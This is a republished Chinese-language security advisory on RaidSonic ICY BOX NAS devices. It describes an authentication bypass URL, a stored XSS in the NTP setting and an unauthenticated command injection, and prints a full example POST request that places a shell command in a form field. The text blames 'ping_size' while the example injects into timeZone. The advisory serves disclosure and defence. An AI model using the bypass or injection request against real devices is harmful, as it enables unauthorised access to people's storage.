RaidSonic IB-NAS5220及IB-NAS4220-B多个漏洞

发布日期：2013-09-25
更新日期：2013-11-02受影响系统：
Raidsonic ICY BOX NAS-4220-B 2.6.3.IB.1.RS.1
Raidsonic ICY BOX NAS-5220 2.6.3-20100206S
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 57958RaidSonic IB-NAS5220、IB-NAS4220-B为网络存储设备。RaidSonic IB-NAS5220、IB-NAS4220-B没有正确过滤 /cgi/time/timeHandler.cgi 脚本内的 "ping_size"参数值，存在安全漏洞，成功利用后可使远程攻击者执行任意命令。<*来源：m-1-k-3

链接：http://www.osvdb.org/90221
http://secunia.com/advisories/52216/
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！Device Name: IB-NAS5220 / IB-NAS4220-B
Vendor: Raidsonic============ Vulnerable Firmware Releases: ============Product Name IB-NAS5220 / IB-NAS4220-B
Tested Firmware IB5220: 2.6.3-20100206S
Tested Firmware IB4220: 2.6.3.IB.1.RS.1Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip============ Vulnerability Overview: ============ * Authentication Bypass:-> Access the following URL to bypass the login procedure:
http://<IP>/nav.cgi？foldName=adm&localePreference=en * Stored XSS:System -> Time Settings -> NTP Server -> User DefineInjecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication.Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png * Unauthenticated OS Command InjectionThe vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands.Example Exploit:
POST /cgi/time/timeHandler.cgi HTTP/1.1
Host: 192.168.178.41
User-Agent: Mozilla/5.0 （Windows NT 6.1; WOW64; rv:16.0） Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.41/cgi/time/time.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 186month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png============ Solution ============No known solution available.============ Credits ============The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-010
Twitter: @s3cur1ty_de============ Time Line: ============August 2012 - discovered vulnerability
27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B
28.08.2012 - vendor responded that they will not publish an update
15.10.2012 - contacted vendor with vulnerability details for IB-NAS5220
15.10.2012 - vendor responded that they will not publish an update
12.02.2013 - public release
===================== Advisory end =====================建议：
--------------------------------------------------------------------------------
厂商补丁：Raidsonic
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.raidsonic.de/en/service.php
http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zipFlashChat upload.php 文件上传远程代码执行漏洞OpenEMR interface/new/new_comprehensive_save.php form_pubid参数SQL注入漏洞相关资讯 RaidSonic 本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容